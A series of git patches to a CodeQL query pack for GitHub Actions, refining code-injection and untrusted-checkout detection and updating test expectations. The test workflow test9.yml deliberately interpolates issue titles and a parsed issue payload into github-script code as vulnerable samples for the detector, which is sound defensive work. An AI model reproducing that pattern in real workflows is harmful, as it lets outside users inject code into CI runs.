.regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\).*", _, offset) - .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\).*", 1) + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 2) } /** diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 7e14825a295..3b968ceaf13 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -25,6 +25,12 @@ where inPrivilegedCompositeAction(sink.getNode().asExpr()) or inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index 7599ef8847b..abecaf997c6 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -24,6 +24,12 @@ where ( inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or inNonPrivilegedJob(sink.getNode().asExpr()) + ) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml index 6ed7db83cb2..47e032fd727 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -25,3 +25,15 @@ jobs: - run: echo ${{ needs.parse-issue.outputs.payload }} - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ fromJson(needs.parse-issue.outputs.payload).version }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index ff378f93af6..7f99d7c9b83 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,3 +1,4 @@ +WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15) edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | @@ -70,6 +71,7 @@ edges | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | @@ -264,6 +266,9 @@ nodes | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -369,6 +374,8 @@ subpaths | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 19b72ad6b5c..f835d492f68 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -70,6 +70,7 @@ edges | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | @@ -264,6 +265,9 @@ nodes | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 69db192378e35b8ec91bbdcf7c04229129460134 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Jul 2024 12:40:48 +0200 Subject: [PATCH 0375/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../query-tests/Security/CWE-094/.github/workflows/test9.yml | 4 ++++ .../Security/CWE-094/CodeInjectionCritical.expected | 2 +- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + 5 files changed, 8 insertions(+), 3 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 320ef23e413..34000094dd8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.11 +version: 0.1.12 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e7a98574a89..5ccbc7b9657 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.11 +version: 0.1.12 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml index 47e032fd727..2d60b9fe6d4 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -37,3 +37,7 @@ jobs: with: script: | core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 7f99d7c9b83..16119dd6453 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,4 +1,3 @@ -WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15) edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | @@ -269,6 +268,7 @@ nodes | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index f835d492f68..d0834f0dff8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -268,6 +268,7 @@ nodes | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 7d58beba677157cac60f19b05981da0e1f522d74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 4 Jul 2024 13:04:59 +0200 Subject: [PATCH 0376/1267] Better control check support --- ql/lib/codeql/actions/Ast.qll | 10 ++- ql/lib/codeql/actions/Helper.qll | 34 ++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++ .../codeql/actions/security/ControlChecks.qll | 77 +++++++++++++++++-- .../actions/security/PoisonableSteps.qll | 5 +- .../security/UntrustedCheckoutQuery.qll | 32 ++++++++ .../CWE-077/EnvPathInjectionCritical.ql | 8 +- .../CWE-077/EnvPathInjectionMedium.ql | 12 +-- .../CWE-077/EnvVarInjectionCritical.ql | 22 ++---- .../Security/CWE-077/EnvVarInjectionMedium.ql | 18 ++--- .../CWE-078/CommandInjectionCritical.ql | 6 +- .../CWE-078/CommandInjectionMedium.ql | 5 +- .../Security/CWE-094/CodeInjectionCritical.ql | 7 +- .../Security/CWE-094/CodeInjectionMedium.ql | 6 +- ql/src/Security/CWE-349/CachePoisoning.ql | 5 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 13 ++-- .../UntrustedCheckoutTOCTOUCritical.ql | 33 ++------ .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 35 ++------- .../CWE-829/ArtifactPoisoningCritical.ql | 7 +- .../CWE-829/ArtifactPoisoningMedium.ql | 6 +- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 8 +- .../CWE-829/UntrustedCheckoutMedium.ql | 7 +- .../CWE-367/.github/workflows/comment.yml | 37 +++++++-- .../UntrustedCheckoutTOCTOUCritical.expected | 18 ++--- .../CWE-829/.github/workflows/test5.yml | 68 ++++++++++++++++ .../CWE-829/.github/workflows/test6.yml | 45 +++++++++++ .../UntrustedCheckoutCritical.expected | 13 ++++ .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 29 files changed, 392 insertions(+), 182 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5e7c6d77c3e..0662f100fe4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -287,13 +287,21 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } +class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpressionImpl { + string getAccessPath() { result = super.getAccessPath() } + + string getInnerExpression() { result = super.getInnerExpression() } +} + class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { string getStepId() { result = super.getStepId() } } -class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { + string getNeededJobId() { result = super.getNeededJobId() } +} class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 72dc7bf1687..3c7091d2a85 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,5 +1,6 @@ private import codeql.actions.Ast private import codeql.Locations +private import codeql.actions.security.ControlChecks bindingset[expr] string normalizeExpr(string expr) { @@ -215,6 +216,20 @@ predicate inPrivilegedCompositeAction(AstNode node) { ) } +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + j = node.getEnclosingJob() and + j.isPrivilegedExternallyTriggerable() and + not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e)) + ) +} + +predicate inPrivilegedContext(AstNode node) { + inPrivilegedCompositeAction(node) + or + inPrivilegedExternallyTriggerableJob(node) +} + predicate inNonPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | a = node.getEnclosingCompositeAction() and @@ -222,13 +237,6 @@ predicate inNonPrivilegedCompositeAction(AstNode node) { ) } -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() - ) -} - predicate inNonPrivilegedJob(AstNode node) { exists(Job j | j = node.getEnclosingJob() and @@ -236,6 +244,12 @@ predicate inNonPrivilegedJob(AstNode node) { ) } +predicate inNonPrivilegedContext(AstNode node) { + inNonPrivilegedCompositeAction(node) + or + inNonPrivilegedJob(node) +} + bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. @@ -244,5 +258,9 @@ predicate outputsPartialFileContent(string snippet) { // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH snippet - .regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + ".*"]) + .regexpMatch([ + "(\\$\\(|`)<.*", + ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + + ".*" + ]) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7c7c6216b1b..bb31e198cc6 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1230,6 +1230,18 @@ string getAJsonReferenceExpression(string s, int offset) { 2) } +bindingset[s] +string getAJsonReferenceAccessPath(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*)", + 3) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability @@ -1245,6 +1257,20 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { abstract AstNodeImpl getTarget(); } +class JsonReferenceExpressionImpl extends ExpressionImpl { + string innerExpression; + string accessPath; + + JsonReferenceExpressionImpl() { + innerExpression = getAJsonReferenceExpression(expression, _) and + accessPath = getAJsonReferenceAccessPath(expression, _) + } + + string getInnerExpression() { result = innerExpression } + + string getAccessPath() { result = accessPath } +} + private string stepsCtxRegex() { result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } @@ -1359,6 +1385,8 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { ) } + string getNeededJobId() { result = neededJob.getId() } + override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 28bc938f8c8..ec7e0ad0598 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -8,6 +8,12 @@ abstract class ControlCheck extends AstNode { this instanceof UsesStep } + predicate protects(Step step, Event event) { + event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and + this.getAProtectedEvent() = event.getName() and + this.dominates(step) + } + predicate dominates(Step step) { this instanceof If and ( @@ -26,22 +32,83 @@ abstract class ControlCheck extends AstNode { or this.(UsesStep).getAFollowingStep() = step } + + abstract string getAProtectedEvent(); + + abstract boolean protectsAgainstRefMutationAttacks(); } -abstract class AssociationCheck extends ControlCheck { } +abstract class AssociationCheck extends ControlCheck { + // checks who you are (identity) + // association checks are effective against pull requests since they can control who is making the PR + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } -abstract class ActorCheck extends ControlCheck { } + override boolean protectsAgainstRefMutationAttacks() { result = true } +} -abstract class RepositoryCheck extends ControlCheck { } +abstract class ActorCheck extends ControlCheck { + // checks who you are (identity) + // actor checks are effective against pull requests since they can control who is making the PR + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } -abstract class LabelCheck extends ControlCheck { } + override boolean protectsAgainstRefMutationAttacks() { result = true } +} -abstract class PermissionCheck extends ControlCheck { } +abstract class RepositoryCheck extends ControlCheck { + // repository checks are effective against pull requests since they can control where the code is coming from + // they are not effective against issue_comment since the repository will always be the same + // who you are (identity) + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + override boolean protectsAgainstRefMutationAttacks() { result = true } +} + +abstract class PermissionCheck extends ControlCheck { + // permission checks are effective against pull requests since they can control who can make changes + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + // who you are (identity) + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + override boolean protectsAgainstRefMutationAttacks() { result = true } +} + + +abstract class LabelCheck extends ControlCheck { + // does it protect injection attacks but not pwn requests? + // pwn requests are susceptible to checkout of mutable code + // but injection attacks are not, although a branch name can be changed after approval and perhaps also some other things + // they do actually protext against untrusted code execution (sha) + // what you have (approval) + // TODO: A check should be a combination of: + // - event type (pull_request, issue_comment, etc) + // - category (untrusted mutable code, untrusted immutable code, code injection, etc) + // - we dont know this unless we pass category to inPrivilegedContext and into ControlCheck.protects + // - we can decide if a control check is effective based only on the ast node + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + // ref can be mutated after approval + override boolean protectsAgainstRefMutationAttacks() { result = false } +} class EnvironmentCheck extends ControlCheck instanceof Environment { + // Environment checks are not effective against any mutable attacks + // they do actually protext against untrusted code execution (sha) + // what you have (approval) EnvironmentCheck() { any() } + + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + // ref can be mutated after approval + override boolean protectsAgainstRefMutationAttacks() { result = false } } +/* Specific implementations of control checks */ + class LabelIfCheck extends LabelCheck instanceof If { LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index c228965736d..dc0f3876f86 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -29,7 +29,8 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) + //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) + cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|\\||\\)|`|$).*", group) ) } @@ -42,7 +43,7 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { class EnvVarInjectionFromFileReadRunStep extends PoisonableStep, Run { EnvVarInjectionFromFileReadRunStep() { - exists(string content, string value| + exists(string content, string value | writeToGitHubEnv(this, content) and extractVariableAndValue(content, _, value) and outputsPartialFileContent(value) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index fcccc5d8a14..8187bca9f04 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -116,6 +116,22 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") ) ) + or + exists(NeedsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getNeededJobId().matches("%" + ["head", "branch", "ref"] + "%") or + e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") + ) + ) + or + exists(JsonReferenceExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getAccessPath().matches("%." + ["head", "branch", "ref"] + 